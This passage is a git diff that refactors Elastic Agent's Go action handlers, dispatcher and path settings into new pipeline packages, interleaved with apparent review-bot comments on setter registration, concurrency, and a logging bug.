@@ -120,7 +127,7 @@ func newManaged( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -131,15 +138,15 @@ func newManaged( return nil, errors.New(err, "failed to initialize composable controller") } - emit, err := emitter( + emit, err := emitter.New( managedApplication.bgContext, log, agentInfo, composableCtrl, router, - &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker, modifiers.InjectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, caps, monitor, @@ -147,12 +154,12 @@ func newManaged( if err != nil { return nil, err } - acker, err := newActionAcker(log, agentInfo, client) + acker, err := fleet.NewAcker(log, agentInfo, client) if err != nil { return nil, err } - batchedAcker := newLazyAcker(acker, log) + batchedAcker := lazy.NewAcker(acker, log) // Create the state store that will persist the last good policy change on disk. stateStore, err := store.NewStateStoreWithMigration(log, paths.AgentActionStoreFile(), paths.AgentStateStoreFile()) 
@@ -162,7 +169,7 @@ func newManaged( managedApplication.stateStore = stateStore actionAcker := store.NewStateStoreActionAcker(batchedAcker, stateStore) - actionDispatcher, err := newActionDispatcher(managedApplication.bgContext, log, &handlerDefault{log: log}) + actionDispatcher, err := dispatcher.New(managedApplication.bgContext, log, handlers.NewDefault(log)) if err != nil { return nil, err } 
@@ -177,60 +184,57 @@ func newManaged( combinedReporter, caps) - policyChanger := &handlerPolicyChange{ - log: log, - emitter: emit, - agentInfo: agentInfo, - config: cfg, - store: storeSaver, - } - if cfg.Fleet.Server == nil { - // setters only set when not running a local Fleet Server - policyChanger.setters = []clientSetter{acker} - } + policyChanger := handlers.NewPolicyChange( + log, + emit, + agentInfo, + cfg, + storeSaver, + ) + actionDispatcher.MustRegister( &fleetapi.ActionPolicyChange{}, policyChanger, ) + actionDispatcher.MustRegister( + &fleetapi.ActionPolicyReassign{}, + handlers.NewPolicyReassign(log), + ) + actionDispatcher.MustRegister( &fleetapi.ActionUnenroll{}, - &handlerUnenroll{ - log: log, - emitter: emit, - dispatcher: router, - closers: []context.CancelFunc{managedApplication.cancelCtxFn}, - stateStore: stateStore, - }, + handlers.NewUnenroll( + log, + emit, + router, + []context.CancelFunc{managedApplication.cancelCtxFn}, + stateStore, + ), ) actionDispatcher.MustRegister( &fleetapi.ActionUpgrade{}, - &handlerUpgrade{ - upgrader: managedApplication.upgrader, - log: log, - }, + handlers.NewUpgrade(log, managedApplication.upgrader), ) actionDispatcher.MustRegister( &fleetapi.ActionSettings{}, - &handlerSettings{ - log: log, - reexec: reexec, - agentInfo: agentInfo, - }, + handlers.NewSettings( + log, + reexec, + agentInfo, + ), ) actionDispatcher.MustRegister( &fleetapi.ActionApp{}, - &handlerAppAction{ - log: log, - }, + handlers.NewAppAction(log, managedApplication.srv), ) actionDispatcher.MustRegister( &fleetapi.ActionUnknown{}, - &handlerUnknown{log: log}, + handlers.NewUnknown(log), ) actions := stateStore.Actions() @@ -244,7 +248,7 @@ func newManaged( } } - gateway, err := newFleetGateway( + gateway, err := fleetgateway.New( managedApplication.bgContext, log, agentInfo, 
@@ -258,13 +262,17 @@ func newManaged( if err != nil { return nil, err } - gateway, err = wrapLocalFleetServer(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) + gateway, err = localgateway.New(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) if err != nil { return nil, err } - // add the gateway to setters, so the gateway can be updated - // when the hosts for Kibana are updated by the policy. - policyChanger.setters = append(policyChanger.setters, gateway) + // add the acker and gateway to setters, so the they can be updated + // when the hosts for Fleet Server are updated by the policy. + if cfg.Fleet.Server == nil { + // setters only set when not running a local Fleet Server + policyChanger.AddSetter(gateway) + policyChanger.AddSetter(acker) + } managedApplication.gateway = gateway return managedApplication, nil diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go index 890183e9033..177ab7cabf3 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go 
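Review bot: The `-258,13 +262,17` hunk changes when and whether client setters are registered, which is more than the package move made in the rest of this file. Previously the gateway was appended unconditionally and the acker was set when `policyChanger` was built; now both are added only at the end of `newManaged`, and only when `cfg.Fleet.Server == nil`. With a local Fleet Server the handler therefore has no setters, and anything dispatched before this point no longer sees the acker setter (the earlier hunk follows `actions := stateStore.Actions()`, presumably a replay of stored actions). If that is intended it should be stated. The new comment also has a typo ("so the they"); I would write `// Register the gateway and acker as client setters so they are updated when the policy changes the Fleet Server hosts; skipped when a local Fleet Server runs.` `newManaged` begins outside this hunk.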
@@ -10,11 +10,18 @@ import ( "testing" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" @@ -23,8 +30,8 @@ import ( ) func TestManagedModeRouting(t *testing.T) { - streams := make(map[routingKey]stream) - streamFn := func(l *logger.Logger, r routingKey) (stream, error) { + streams := make(map[pipeline.RoutingKey]pipeline.Stream) + streamFn := func(l *logger.Logger, r pipeline.RoutingKey) (pipeline.Stream, error) { m := newMockStreamStore() streams[r] = m 
@@ -34,33 +41,33 @@ func TestManagedModeRouting(t *testing.T) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log, _ := logger.New("") - router, _ := newRouter(log, streamFn) + log, _ := logger.New("", false) + router, _ := router.New(log, streamFn) agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} composableCtrl, _ := composable.New(log, nil) - emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}, nil) + emit, err := emitter.New(ctx, log, agentInfo, composableCtrl, router, &pipeline.ConfigModifiers{Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}}, nil) require.NoError(t, err) - actionDispatcher, err := newActionDispatcher(ctx, log, &handlerDefault{log: log}) + actionDispatcher, err := dispatcher.New(ctx, log, handlers.NewDefault(log)) require.NoError(t, err) cfg := configuration.DefaultConfiguration() actionDispatcher.MustRegister( &fleetapi.ActionPolicyChange{}, - &handlerPolicyChange{ - log: log, - emitter: emit, - agentInfo: agentInfo, - config: cfg, - store: nullStore, - }, + handlers.NewPolicyChange( + log, + emit, + agentInfo, + cfg, + nullStore, + ), ) actions, err := testActions() require.NoError(t, err) - err = actionDispatcher.Dispatch(newNoopAcker(), actions...) + err = actionDispatcher.Dispatch(noopacker.NewAcker(), actions...) require.NoError(t, err) // has 1 config request for fb, mb and monitoring? 
@@ -72,10 +79,10 @@ func TestManagedModeRouting(t *testing.T) { confReq := defaultStreamStore.(*mockStreamStore).store[0] assert.Equal(t, 3, len(confReq.ProgramNames())) - assert.Equal(t, monitoringName, confReq.ProgramNames()[2]) + assert.Equal(t, modifiers.MonitoringName, confReq.ProgramNames()[2]) } -func testActions() ([]action, error) { +func testActions() ([]fleetapi.Action, error) { checkinResponse := &fleetapi.CheckinResponse{} if err := json.Unmarshal([]byte(fleetResponse), &checkinResponse); err != nil { return nil, err diff --git a/x-pack/elastic-agent/pkg/agent/application/once.go b/x-pack/elastic-agent/pkg/agent/application/once.go index e4cb1d6dd90..39d53512a24 100644 --- a/x-pack/elastic-agent/pkg/agent/application/once.go +++ b/x-pack/elastic-agent/pkg/agent/application/once.go @@ -5,17 +5,19 @@ package application import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) type once struct { log *logger.Logger discover discoverFunc - emitter emitterFunc + emitter pipeline.EmitterFunc } -func newOnce(log *logger.Logger, discover discoverFunc, emitter emitterFunc) *once { +func newOnce(log *logger.Logger, discover discoverFunc, emitter pipeline.EmitterFunc) *once { return &once{log: log, discover: discover, emitter: emitter} } @@ -35,3 +37,12 @@ func (o *once) Start() error { func (o *once) Stop() error { return nil } + +func readfiles(files []string, emitter pipeline.EmitterFunc) error { + c, err := config.LoadFiles(files...) + if err != nil { + return errors.New(err, "could not load or merge configuration", errors.TypeConfig) + } + + return emitter(c) +} 
diff --git a/x-pack/elastic-agent/pkg/agent/application/paths/common.go b/x-pack/elastic-agent/pkg/agent/application/paths/common.go index fca3dbd8828..d5d56d5d000 100644 --- a/x-pack/elastic-agent/pkg/agent/application/paths/common.go +++ b/x-pack/elastic-agent/pkg/agent/application/paths/common.go @@ -16,24 +16,33 @@ import ( ) const ( - tempSubdir = "tmp" + // DefaultConfigName is the default name of the configuration file. + DefaultConfigName = "elastic-agent.yml" + // AgentLockFileName is the name of the overall Elastic Agent file lock. + AgentLockFileName = "agent.lock" + tempSubdir = "tmp" ) var ( - topPath string - configPath string - logsPath string - tmpCreator sync.Once + topPath string + configPath string + configFilePath string + logsPath string + unversionedHome bool + tmpCreator sync.Once ) func init() { topPath = initialTop() configPath = topPath logsPath = topPath + unversionedHome = false // only versioned by container subcommand fs := flag.CommandLine fs.StringVar(&topPath, "path.home", topPath, "Agent root path") + fs.BoolVar(&unversionedHome, "path.home.unversioned", unversionedHome, "Agent root path is not versioned based on build") fs.StringVar(&configPath, "path.config", configPath, "Config path is the directory Agent looks for its config file") + fs.StringVar(&configFilePath, "c", DefaultConfigName, "Configuration file, relative to path.config") fs.StringVar(&logsPath, "path.logs", logsPath, "Logs path contains Agent log output") } @@ -43,6 +52,14 @@ func Top() string { return topPath } +// SetTop overrides the Top path. +// +// Used by the container subcommand to adjust the overall top path allowing state can be maintained between container +// restarts. +func SetTop(path string) { + topPath = path +} + // TempDir returns agent temp dir located within data dir. func TempDir() string { tmpDir := filepath.Join(Data(), tempSubdir) 
@@ -55,16 +72,55 @@ func TempDir() string { // Home returns a directory where binary lives func Home() string { + if unversionedHome { + return topPath + } return versionedHome(topPath) } +// IsVersionHome returns true if the Home path is versioned based on build. +func IsVersionHome() bool { + return !unversionedHome +} + +// SetVersionHome sets if the Home path is versioned based on build. +// +// Used by the container subcommand to adjust the home path allowing state can be maintained between container +// restarts. +func SetVersionHome(version bool) { + unversionedHome = !version +} + // Config returns a directory where configuration file lives func Config() string { return configPath } +// SetConfig overrides the Config path. +// +// Used by the container subcommand to adjust the overall config path allowing state can be maintained between container +// restarts. +func SetConfig(path string) { + configPath = path +} + +// ConfigFile returns the path to the configuration file. +func ConfigFile() string { + if configFilePath == "" || configFilePath == DefaultConfigName { + return filepath.Join(Config(), DefaultConfigName) + } + if filepath.IsAbs(configFilePath) { + return configFilePath + } + return filepath.Join(Config(), configFilePath) +} + // Data returns the data directory for Agent func Data() string { + if unversionedHome { + // unversioned means the topPath is the data path + return topPath + } return filepath.Join(Top(), "data") } @@ -73,6 +129,11 @@ func Logs() string { return logsPath } +// SetLogs updates the path for the logs. +func SetLogs(path string) { + logsPath = path +} + // initialTop returns the initial top-level path for the binary // // When nested in top-level/data/elastic-agent-${hash}/ the result is top-level/. diff --git a/x-pack/elastic-agent/pkg/agent/application/periodic.go b/x-pack/elastic-agent/pkg/agent/application/periodic.go index 9e13251f4f1..d21d8bb4cbd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/periodic.go 
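Review bot: `ConfigFile` in the `-55,16 +72,55` hunk returns an absolute `-c` value unchanged and joins a relative one to `Config()`, but its doc comment says only that it returns the path. The flag help added earlier in this file describes the value as relative to path.config. Since the result decides which configuration the agent loads, the comment should spell the rule out, e.g. `// ConfigFile returns the configuration file path: an absolute -c value is used as-is, otherwise it is joined to Config().` `SetVersionHome` and `SetConfig` write package-level variables that `Home`, `Data` and `Config` read without synchronization. Their comments should say they must be called during startup, before other goroutines read the paths; the current wording suggests the container subcommand uses them that way but does not require it.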
+++ b/x-pack/elastic-agent/pkg/agent/application/periodic.go @@ -8,6 +8,7 @@ import ( "strings" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/filewatcher" @@ -18,7 +19,7 @@ type periodic struct { period time.Duration done chan struct{} watcher *filewatcher.Watch - emitter emitterFunc + emitter pipeline.EmitterFunc discover discoverFunc } @@ -108,7 +109,7 @@ func newPeriodic( log *logger.Logger, period time.Duration, discover discoverFunc, - emitter emitterFunc, + emitter pipeline.EmitterFunc, ) *periodic { w, err := filewatcher.New(log, filewatcher.DefaultComparer) diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go new file mode 100644 index 00000000000..293530b5edd --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package actions + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" +) + +// Handler handles action coming from fleet. +type Handler interface { + Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error +} + +// ClientSetter sets the client for communication. +type ClientSetter interface { + SetClient(client.Sender) +} 
diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go new file mode 100644 index 00000000000..a8e7b883258 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go 
@@ -0,0 +1,82 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + "fmt" + "time" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +const defaultActionTimeout = time.Minute + +// AppAction is a handler for application actions. +type AppAction struct { + log *logger.Logger + srv *server.Server +} + +// NewAppAction creates a new AppAction handler. +func NewAppAction(log *logger.Logger, srv *server.Server) *AppAction { + return &AppAction{ + log: log, + srv: srv, + } +} + +// Handle handles application action. +func (h *AppAction) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Debugf("handlerAppAction: action '%+v' received", a) + action, ok := a.(*fleetapi.ActionApp) + if !ok { + return fmt.Errorf("invalid type, expected ActionApp and received %T", a) + } + + appState, ok := h.srv.FindByInputType(action.InputType) + if !ok { + return fmt.Errorf("matching app is not found for action input: %s", action.InputType) + } + + params, err := action.MarshalMap() + if err != nil { + return err + } + + start := time.Now().UTC() + res, err := appState.PerformAction(action.InputType, params, defaultActionTimeout) + end := time.Now().UTC() + + startFormatted := start.Format(time.RFC3339Nano) + endFormatted := end.Format(time.RFC3339Nano) + if err != nil { + action.StartedAt = startFormatted + action.CompletedAt = endFormatted + action.Error = err.Error() + } else { + action.StartedAt = readMapString(res, "started_at", startFormatted) + action.CompletedAt = readMapString(res, 
"completed_at", endFormatted) + action.Error = readMapString(res, "error", "") + } + + return acker.Ack(ctx, action) +} + +func readMapString(m map[string]interface{}, key string, def string) string { + if m == nil { + return def + } + + if v, ok := m[key]; ok { + if s, ok := v.(string); ok && s != "" { + return s + } + } + return def +} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go similarity index 74% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go index 76bdf4c0cac..71347407768 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "bytes" @@ -13,6 +13,10 @@ import ( "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "gopkg.in/yaml.v2" 
@@ -29,20 +33,46 @@ const ( apiStatusTimeout = 15 * time.Second ) -type clientSetter interface { - SetClient(clienter) -} - -type handlerPolicyChange struct { +// PolicyChange is a handler for POLICY_CHANGE action. +type PolicyChange struct { log *logger.Logger - emitter emitterFunc + emitter pipeline.EmitterFunc agentInfo *info.AgentInfo config *configuration.Configuration store storage.Store - setters []clientSetter + setters []actions.ClientSetter +} + +// NewPolicyChange creates a new PolicyChange handler. +func NewPolicyChange( + log *logger.Logger, + emitter pipeline.EmitterFunc, + agentInfo *info.AgentInfo, + config *configuration.Configuration, + store storage.Store, + setters ...actions.ClientSetter, +) *PolicyChange { + return &PolicyChange{ + log: log, + emitter: emitter, + agentInfo: agentInfo, + config: config, + store: store, + setters: setters, + } +} + +// AddSetter adds a setter into a collection of client setters. +func (h *PolicyChange) AddSetter(cs actions.ClientSetter) { + if h.setters == nil { + h.setters = make([]actions.ClientSetter, 0) + } + + h.setters = append(h.setters, cs) } -func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetAcker) error { +// Handle handles policy change action. +func (h *PolicyChange) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerPolicyChange: action '%+v' received", a) action, ok := a.(*fleetapi.ActionPolicyChange) if !ok { @@ -66,7 +96,7 @@ func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetA return acker.Ack(ctx, action) } -func (h *handlerPolicyChange) handleKibanaHosts(ctx context.Context, c *config.Config) (err error) { +func (h *PolicyChange) handleKibanaHosts(ctx context.Context, c *config.Config) (err error) { // do not update kibana host from policy; no setters provided with local Fleet Server if len(h.setters) == 0 { return nil 
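Review bot: `AddSetter` in the `-29,20 +33,46` hunk guards `append` with a nil check that Go does not need, and it mutates `h.setters` without any locking although `handleKibanaHosts` reads the same slice. The body can be just `h.setters = append(h.setters, cs)`. The call site in `newManaged` suggests setters can be added after the dispatcher has started handling actions. If so, either the doc comment should say `// AddSetter is not safe for concurrent use with Handle.` or the slice should be protected by a mutex.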
@@ -98,7 +128,7 @@ func (h *handlerPolicyChange) handleKibanaHosts(ctx context.Context, c *config.C } }() - client, err := fleetapi.NewAuthWithConfig(h.log, h.config.Fleet.AccessAPIKey, h.config.Fleet.Kibana) + client, err := client.NewAuthWithConfig(h.log, h.config.Fleet.AccessAPIKey, h.config.Fleet.Kibana) if err != nil { return errors.New( err, "fail to create API client with updated hosts", diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go similarity index 93% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go index c30f886b0d1..1ab7ee20fdd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" @@ -20,6 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" ) type mockEmitter struct { @@ -33,8 +34,8 @@ func (m *mockEmitter) Emitter(policy *config.Config) error { } func TestPolicyChange(t *testing.T) { - log, _ := logger.New("") - ack := newNoopAcker() + log, _ := logger.New("", false) + ack := noopacker.NewAcker() agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} 
@@ -49,7 +50,7 @@ func TestPolicyChange(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -74,7 +75,7 @@ func TestPolicyChange(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -88,7 +89,7 @@ func TestPolicyChange(t *testing.T) { } func TestPolicyAcked(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} @@ -107,7 +108,7 @@ func TestPolicyAcked(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -136,7 +137,7 @@ func TestPolicyAcked(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go new file mode 100644 index 00000000000..2a53ac0ae2b --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go 
@@ -0,0 +1,38 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// PolicyReassign handles policy reassign change coming from fleet. +type PolicyReassign struct { + log *logger.Logger +} + +// NewPolicyReassign creates a new PolicyReassign handler. +func NewPolicyReassign(log *logger.Logger) *PolicyReassign { + return &PolicyReassign{ + log: log, + } +} + +// Handle handles POLICY_REASSIGN action. +func (h *PolicyReassign) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Debugf("handlerPolicyReassign: action '%+v' received", a) + + if err := acker.Ack(ctx, a); err != nil { + h.log.Errorf("failed to acknowledge POLICY_REASSIGN action with id '%s'", a.ID) + } else if err := acker.Commit(ctx); err != nil { + h.log.Errorf("failed to commit acker after acknowledging action with id '%s'", a.ID) + } + + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go similarity index 72% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go index bb0e2def363..17b0b8ac4a0 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go 
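Review bot: Both `Errorf` calls in `PolicyReassign.Handle` pass `a.ID` rather than `a.ID()`. `a` is the `fleetapi.Action` interface, so `a.ID` is a method value and `%s` will print a function value instead of the action id. Assuming `ID` takes no arguments and returns the id string, call it and include the dropped error: `h.log.Errorf("failed to acknowledge POLICY_REASSIGN action with id '%s': %v", a.ID(), err)`, and likewise for the commit branch. The handler also returns nil when the ack or commit fails, so the dispatcher never learns of it; if that best-effort behaviour is intended, a short comment saying so would help.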
@@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" @@ -10,19 +10,37 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -// handlerSettings handles settings change coming from fleet and updates log level. -type handlerSettings struct { +type reexecManager interface { + ReExec(argOverrides ...string) +} + +// Settings handles settings change coming from fleet and updates log level. +type Settings struct { log *logger.Logger reexec reexecManager agentInfo *info.AgentInfo } +// NewSettings creates a new Settings handler. +func NewSettings( + log *logger.Logger, + reexec reexecManager, + agentInfo *info.AgentInfo, +) *Settings { + return &Settings{ + log: log, + reexec: reexec, + agentInfo: agentInfo, + } +} + // Handle handles SETTINGS action. -func (h *handlerSettings) Handle(ctx context.Context, a action, acker fleetAcker) error { +func (h *Settings) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerUpgrade: action '%+v' received", a) action, ok := a.(*fleetapi.ActionSettings) if !ok { diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go similarity index 55% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go index a0cec2753ee..aeecf865b0f 100644 
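Review bot: The debug line at the top of `Settings.Handle` still reads `handlerUpgrade: action '%+v' received`, so a settings action shows up in the agent log as if the upgrade handler had processed it. The hunk already rewrites the method signature on the line above, so this is the place to change the prefix to `handlerSettings:`. The new `reexecManager` interface also has no doc comment; something like `// reexecManager restarts the agent process, optionally overriding its arguments.` would do, if that matches what ReExec does. Handle's body continues outside the hunk.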
--- a/x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go
+++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go
@@ -2,28 +2,56 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" "fmt" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -// After running Unenroll agent is in idle state, non managed non standalone. +type stateStore interface { + Add(fleetapi.Action) + AckToken() string + SetAckToken(ackToken string) + Save() error + Actions() []fleetapi.Action +} + +// Unenroll results in running agent entering idle state, non managed non standalone. // For it to be operational again it needs to be either enrolled or reconfigured. -type handlerUnenroll struct { +type Unenroll struct { log *logger.Logger - emitter emitterFunc - dispatcher programsDispatcher + emitter pipeline.EmitterFunc + dispatcher pipeline.Router closers []context.CancelFunc stateStore stateStore } -func (h *handlerUnenroll) Handle(ctx context.Context, a action, acker fleetAcker) error { +// NewUnenroll creates a new Unenroll handler. +func NewUnenroll( + log *logger.Logger, + emitter pipeline.EmitterFunc, + dispatcher pipeline.Router, + closers []context.CancelFunc, + stateStore stateStore, +) *Unenroll { + return &Unenroll{ + log: log, + emitter: emitter, + dispatcher: dispatcher, + closers: closers, + stateStore: stateStore, + } +} + +// Handle handles UNENROLL action. +func (h *Unenroll) Handle(ctx context.Context, a fleetapi.Action, acker 